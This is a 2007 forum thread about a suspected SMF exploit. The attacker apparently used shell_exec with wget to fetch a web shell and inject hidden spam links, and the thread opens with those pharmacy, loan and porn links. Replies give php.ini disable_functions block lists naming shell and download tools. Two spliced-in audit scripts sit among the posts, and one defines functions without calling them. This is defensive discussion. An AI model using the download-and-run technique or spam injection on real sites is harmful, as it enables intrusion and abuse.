 college of pharmacy <a href="http://forum.cmsmadesimple.org/Packages/backups/css/15/index.html">fast payday loan geigertown pennsylvania</a> pharmacy ce<br>
 tadalafil mastercard <a href="http://forum.cmsmadesimple.org/Packages/backups/css/16/index.html">payday advance loan umbarger texas</a> tadalafil compare<br>
 sildenafil and pulmonary <a href="http://forum.cmsmadesimple.org/Packages/backups/css/17/index.html">payday cash advance papalote texas</a> disfuncion erectil<br>
 sildenafil patent <a href="http://forum.cmsmadesimple.org/Packages/backups/css/18/index.html">payday loans league city tx</a> erectile dysfunction impotence<br>
 pharmacy ce <a href="http://forum.cmsmadesimple.org/Packages/backups/css/19/index.html">get cash until payday loan</a> sildenafil citrate online<br>
 liquid sildenafil <a href="http://forum.cmsmadesimple.org/Packages/backups/css/20/index.html">lendingtree for payday loans</a> vardenafil sildenafil<br>
 mg tadalafil <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/1/index.html">videos samples for i pod adult</a> erectile dysfunction commercials<br>
 pharmacy prices <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/2/index.html">3pg porn movies</a> cures for erectile dysfunction<br>
 side effects of <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/3/index.html">free manga movie porn sex</a> blood pressure erectile dysfunction<br>
 sildenafil structure <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/4/index.html">xxx porn squirting pussy</a> tadalafil overnight<br>
 tadalafil with <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/5/index.html">mature picture porn woman xxx</a> sildenafil over the counter<br>
 online pharmacy no prescription <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/6/index.html">adult movies downloads</a> effects of tadalafil<br>
 does viagra work <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/7/index.html">porn movie carnal desire cast</a> sildenafil citrate overnight<br>
 sildenafil treatment <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/8/index.html">home amateur porn movies</a> where to buy sildenafil<br>
 erectile dysfunction impotence <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/9/index.html">porn movie store</a> sildenafil dosage<br>
 erectile dysfunction exercises <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/10/index.html">free adult videos and pics ameture</a> vardenafil dosage<br>
 sams club pharmacy <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/11/index.html">free porn video no subscription</a> freedom pharmacy<br>
 st louis college of pharmacy <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/12/index.html">chart porn movies</a> sildenafil discount<br>
</font>

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #6 on: September 29, 2007, 03:20:05 PM »
There were a few security fixes in 1.1.4, one of them might be related to your problem. We have been unaware of them being used in the wild, but one of our developers might be able to determine more once they go through the security report.
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #7 on: September 29, 2007, 03:32:19 PM »
Let's hope so. The only thing I see relevant under the changelog is this...
Quote
! Some input values didn't get escaped properly - reported by Michael Brooks. (ManageMembergroups.php, PersonalMessages.php, Post.php, Profile.php, QueryString.php, Search.php, Subs-Boards.php, Subs.php)

But it's a wild guess at this point; whatever the problem, it looks like it allows an attacker to download a script just from POSTing some data.

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #8 on: September 29, 2007, 03:42:22 PM »
Of course, you should have allow_url_fopen turned off unless there is a specific need for it, then enable only for that script or directory. That will pretty much stop server-side remote inclusion attacks in general.
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #9 on: September 29, 2007, 04:00:02 PM »
I'm not up and up on the subject, but from what I understand the issue here is with the attacker being able to call 'wget' or something similar from the shell to download a script. Like 'shell_exec(wget(...))', which gets around allow_url_fopen.
« Last Edit: September 29, 2007, 05:00:14 PM by be_cool »

Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #10 on: September 29, 2007, 06:08:22 PM »
The attack itself is a mystery since I do not log POST data in any way, but a fix for this is to disable certain PHP functions...

Quote
disable_functions = exec,passthru,shell_exec,system,show_source

This should prevent most scripted attacks, but you still have functions like...
proc_open,popen,curl_exec,ini_alter/set,parse_ini_file

And you can also disable the allow_url_fopen wrapper, just in case...
Quote
allow_url_fopen = Off

You might also want to run http://rkhunter.sourceforge.net/ [nofollow] and get this setup...
http://la-samhna.de/samhain/ [nofollow]
« Last Edit: September 29, 2007, 06:50:37 PM by be_cool »

Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #11 on: September 30, 2007, 09:45:20 AM »
I've been playing around with queries on google, trying to locate other "Powered by SMF" forums with the spam keywords inserted, and it looks like there is a bunch of them.

Here are a couple.
Code: [Select]
http://omnifind.ibm.yahoo.net/forums/index.php
http://www.liftport.com/forums/
http://forums.questionablecontent.net/
http://www.zerr.org/family/index.php
http://forum.joomlaworks.gr/index.php

[I've put it in code so you guys are not linking to spam sites]

Just look at the source of the page, at the very bottom it will have spam links inserted.
« Last Edit: September 30, 2007, 09:59:27 AM by be_cool »

Offline SlammedDime

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 10,280
  • School of Air Ride
    • matt.zuba on Facebook
    • @mattzuba on Twitter
    • ZubaFitness
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #12 on: September 30, 2007, 12:51:52 PM »
Most, if not all of the 'fetching preview' problems come from people modifying files incorrectly, or breaking javascript by inserting their own for ads or whatever the case may be.
SlammedDime
Former Lead Customizer
BitBucket Projects
GeekStorage.com Hosting
My Mods
SimpleSEF
Ajax Quick Reply
Sitemap
more...

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #13 on: September 30, 2007, 02:00:34 PM »
I checked the six SMF forums (4 I admin, 2 I'm a member) that I keep an eye on, and none of them have been affected in this way (despite at least two running an old version for a bit longer than they should have).
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #14 on: September 30, 2007, 03:22:56 PM »
The attacker found me via google query...
Quote
"Powered by SMF 1.1.3" site:net
...a few days after the release of 1.1.4.

So I am thinking that this was fixed with 1.1.4.

I'm also suspecting he/she used shell_exec(wget ...) to d/l the web shell that was used to edit index.php and do other stuff.

I run my SMF forum on a VPS that I administer myself and did not have any PHP functions disabled under php.ini, unlike most hosts that probably do disable the above mentioned functions().

I have not looked into it further, but I'm pretty sure the preview feature was broken by the inserted hidden spam links.

I see now that I was jumping the gun by suggesting that there was a strong correlation between this hack and the problems some users reported.

Though unless this attack is specific to v1.1.3, chances are the previous versions are also susceptible when they run on a host that does not have the mentioned PHP functions disabled.

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #15 on: September 30, 2007, 05:01:35 PM »
Though unless this attack is specific to v1.1.3, chances are the previous versions are also susceptible when they run on a host that does not have the mentioned PHP functions disabled.

As far as I know, we have not looked at all the releases we have put out in the past.

Regardless, there is a reason we emphasize keeping updated so heavily. It is much harder to update to 1.1.4 when you are still on one of the 1.1 RC releases. Likewise for the 1.0 line as well. It might cause a little pain now, but being able to keep up with the latest fixes is much more important, especially with the security fixes added since 1.1 RC3.
« Last Edit: September 30, 2007, 05:08:25 PM by Motoko-chan »
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline SteveWh

  • Semi-Newbie
  • *
  • Posts: 15
  • Gender: Male
    • 25yearsofprogramming.com
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #16 on: October 01, 2007, 02:10:23 AM »
be_cool, thanks for making this report. It gives us all some advance warning.

...a fix for this is to disable certain PHP functions...

Code: [Select]
disable_functions = exec,passthru,shell_exec,system,show_source

This should prevent most scripted attacks, but you still have functions like...
proc_open,popen,curl_exec,ini_alter/set,parse_ini_file

Except for SMF, I use only very basic PHP commands on my site, and so could disable quite a few without breaking anything. I did automated searches of the SMF 1.1.4 code to try to discover which functions could safely be disabled without breaking SMF's functionality. 

Of the functions you mentioned, shell_exec and ini_set appear to be used, so they probably shouldn't be disabled.

I wound up with this tentative line for php.ini. To all the functions you mentioned, I added some more.

disable_functions = exec,passthru,system,show_source,proc_open,proc_close,popen,pclose,curl_exec,parse_ini_file,dl

This is not tested at all as of this moment, and I'm a beginner at PHP (that's a warning about the validity of this fn list). If anyone sees that something in the line will break SMF, please say so.

The webhost I'm at doesn't allow the use of wget. That's one protection.

Anyone who hosts from their own PC could (?) move the wget executable to a directory that isn't in the search path so it can only be run by someone who knows exactly where it is.
« Last Edit: October 01, 2007, 04:12:23 AM by SteveWh »
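The search for functions that SMF actually calls, as an added example that is not SMF project code: a POSIX shell script that greps a PHP tree for calls to each candidate function and emits a disable_functions line naming only the ones never called. The tree it scans is constructed for the demo (one file calling shell_exec and ini_set, the two functions the thread notes SMF uses); point it at a real forum directory instead.

```shell
#!/bin/sh
# Added example (not SMF project code): grep a PHP tree for calls to each
# function a php.ini disable_functions line might name, then emit a line that
# disables only the functions the code never calls.
set -e

# The candidate list discussed in the thread, plus ini_set, which SMF also uses.
CANDIDATES="exec passthru shell_exec system show_source proc_open proc_close popen pclose curl_exec parse_ini_file dl ini_set"

# Print each candidate that appears as a call (name followed by "(") in any
# .php file under $1. -w keeps "shell_exec(" from counting as a use of exec.
used_functions() {
  for fn in $CANDIDATES; do
    hits=$(find "$1" -type f -name '*.php' -exec grep -lwE "$fn[[:space:]]*\(" {} \; 2>/dev/null)
    if [ -n "$hits" ]; then echo "$fn"; fi
  done
  return 0
}

# Emit the php.ini directive: every candidate not found in the tree.
safe_disable_line() {
  used=$(used_functions "$1" | tr '\n' ' ')
  out=""
  for fn in $CANDIDATES; do
    case " $used " in
      *" $fn "*) ;;                     # called somewhere in the tree: keep it enabled
      *) out="${out:+$out,}$fn" ;;
    esac
  done
  echo "disable_functions = $out"
}

# Constructed sample standing in for an SMF install: one source file that calls
# shell_exec (as the thread says SMF's host_from_ip does) and ini_set, nothing else.
make_sample_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/Sources"
  cat > "$d/Sources/Subs.php" <<'EOF'
<?php
function host_from_ip($ip)
{
    return @shell_exec('/usr/bin/host ' . escapeshellarg($ip));
}
@ini_set('memory_limit', '128M');
EOF
  echo "$d"
}

# Usage: sh scan.sh /path/to/forum   (with no argument, the constructed sample is scanned)
tree=${1:-$(make_sample_tree)}
safe_disable_line "$tree"
[ -n "${1:-}" ] || rm -rf "$tree"
```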

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #17 on: October 01, 2007, 02:24:24 AM »
Of the functions you mentioned, shell_exec and ini_set appear to be used, so they probably shouldn't be disabled.

I believe we only use shell_exec for DNS lookups. If you disable hostname lookups, you should be okay disabling that function as well. Of course, I haven't studied the code all that closely lately, so there might be something else using it as well.


The webhost I'm at doesn't allow the use of wget. That's one protection.

Anyone who hosts from their own PC could (?) move the wget executable to a directory that isn't in the search path so it can only be run by someone who knows exactly where it is.

Don't forget curl. It is designed to be easier to program, anyway. Heck, libcurl can even be in PHP if enabled (and some hosts enable it as some payment gateways use it). There is also lynx, too. If all else fails, if perl is on the system (it almost always is, many system commands need it) that can be used and there is a bonus if LWP is installed. Note that these are just the ways I thought of off the top of my head. Moving executables is pointless when there are so many ways to get around missing one. The best protection in this case is vigilance.
« Last Edit: October 01, 2007, 02:26:10 AM by Motoko-chan »
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline SteveWh

  • Semi-Newbie
  • *
  • Posts: 15
  • Gender: Male
    • 25yearsofprogramming.com
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #18 on: October 01, 2007, 03:26:46 AM »
I believe we only use shell_exec for DNS lookups. If you disable hostname lookups, you should be okay disabling that function as well. Of course, I haven't studied the code all that closely lately, so there might be something else using it as well.
You're right. I just checked. Only 3 uses of it, all in one function, host_from_ip($ip).

Revised php.ini line. I tested a variation of this. Browsing through forum pages and in the Admin area produced no errors:

disable_functions = exec,shell_exec,passthru,system,show_source,proc_open,popen,parse_ini_file,dl,curl_errno,curl_error,curl_exec,curl_init,curl_multi_add_handle,curl_multi_exec,curl_multi_init,curl_multi_select,curl_setopt_array,curl_setopt

I think I've seen an injection attack script that used ftp to retrieve the remote shell script, so the whole slew of ftp_ commands could be added to the list, too. However, ftp_ functions are used extensively by SMF's install.php and the Package Manager, so you'd have to remember to enable them before using those functions.

Basically, you just have to keep attackers out so they can't get to the "import a remote file" stage of the attack. The first "import a remote script" is often done by injection of a URL in a query string, so allow_url_fopen = Off will usually prevent them from getting to the second stage. Also blocking libwww-perl in .htaccess will help, as it is the most common User-Agent used (actually the only one I've seen used so far).

Once they're in, allow_url_fopen = Off won't prevent them from using the ftp_ functions. (I realized that just now: the Package Manager upgrade from 1.1.3 to 1.1.4 a couple days ago was successful even though allow_url_fopen was Off in php.ini.)

Useful security-related php.ini settings:

register_globals = Off
allow_url_fopen = Off
disable_functions = (as above)
display_errors = Off
display_startup_errors = Off
error_log = /home/{user}/{path}/(unknown)
error_reporting = E_ALL
expose_php = Off
log_errors = On
« Last Edit: October 01, 2007, 05:05:52 AM by SteveWh »
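An added example (not SMF or PHP project code) that turns the php.ini checklist above into an audit: a POSIX shell script that reads a php.ini, compares each directive with the value recommended in the thread, and checks that disable_functions covers the agreed list (shell_exec and ini_set left enabled, since SMF calls them). The two php.ini files it reads are constructed for the demo.

```shell
#!/bin/sh
# Added example (not SMF or PHP project code): audit a php.ini file against the
# hardening settings collected in this thread and report each deviation.
set -e

# Functions disable_functions must name. shell_exec is left out because SMF's
# host_from_ip() calls it, and ini_set because SMF uses it too.
REQUIRED_DISABLED="exec passthru system show_source proc_open popen parse_ini_file dl curl_exec"

# Value of directive $2 in file $1: the last uncommented "key = value" line,
# with quotes, spaces and any trailing ";comment" stripped, lower-cased.
ini_value() {
  sed -n -E "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*([^;]*).*/\1/p" "$1" |
    tail -n 1 | tr -d '" ' | tr 'A-Z' 'a-z'
}

# Print one line per deviation; the return status is the number of deviations
# (0 means the file matches every recommended setting).
audit_ini() {
  ini=$1; n=0
  for pair in register_globals:off allow_url_fopen:off display_errors:off \
              display_startup_errors:off expose_php:off log_errors:on \
              error_reporting:e_all; do
    key=${pair%%:*}; want=${pair##*:}
    got=$(ini_value "$ini" "$key")
    # A directive that is absent is reported too: the file should state it explicitly.
    if [ "$got" != "$want" ]; then
      echo "$key = ${got:-<unset>} (want $want)"; n=$((n + 1))
    fi
  done
  disabled=$(ini_value "$ini" disable_functions | tr ',' ' ')
  for fn in $REQUIRED_DISABLED; do
    case " $disabled " in
      *" $fn "*) ;;
      *) echo "disable_functions lacks $fn"; n=$((n + 1)) ;;
    esac
  done
  return $n
}

# Two constructed php.ini files: a permissive one and one hardened as the thread suggests.
write_samples() {
  d=$(mktemp -d)
  printf '%s\n' 'register_globals = On' 'allow_url_fopen = On' 'display_errors = On' \
    'expose_php = On' 'log_errors = Off' 'error_reporting = E_ALL & ~E_NOTICE' \
    'disable_functions = exec,passthru' > "$d/weak.ini"
  printf '%s\n' 'register_globals = Off' 'allow_url_fopen = Off' \
    'disable_functions = exec,passthru,system,show_source,proc_open,popen,parse_ini_file,dl,curl_exec' \
    'display_errors = Off' 'display_startup_errors = Off' 'log_errors = On' \
    'error_reporting = E_ALL' 'expose_php = Off ; hide the X-Powered-By header' > "$d/hardened.ini"
  echo "$d"
}
```

Run `audit_ini /etc/php.ini` (or wherever your host keeps it) and fix each reported line; a zero exit status means nothing on the list is missing.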

Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #19 on: October 01, 2007, 09:47:00 AM »
Quote
-rwxr-xr-x  1 root root 1174840 Nov 11  2005 /usr/bin/lynx
-rwxr-xr-x  1 root root 200392 Nov  2  2005 /usr/bin/wget
-rwxr-xr-x  1 root root 76252 May  2 17:29 /usr/bin/curl
-rwxr-xr-x  2 root root 12548 Aug 12  2006 /usr/bin/perl
-rwxr-xr-x  2 root root 12548 Aug 12  2006 /usr/bin/perl5.8.5

There is also one called 'links', but I think last I saw that was RH7.3.

PHP runs as the apache child process user. So you could just remove the execute bit for everyone else but root:root with chmod 754. But I'm not sure if that could break something like yum, apt-get, etc.

But then you have scp, ftp, and so many other ways to d/l something...
« Last Edit: October 01, 2007, 09:57:04 AM by be_cool »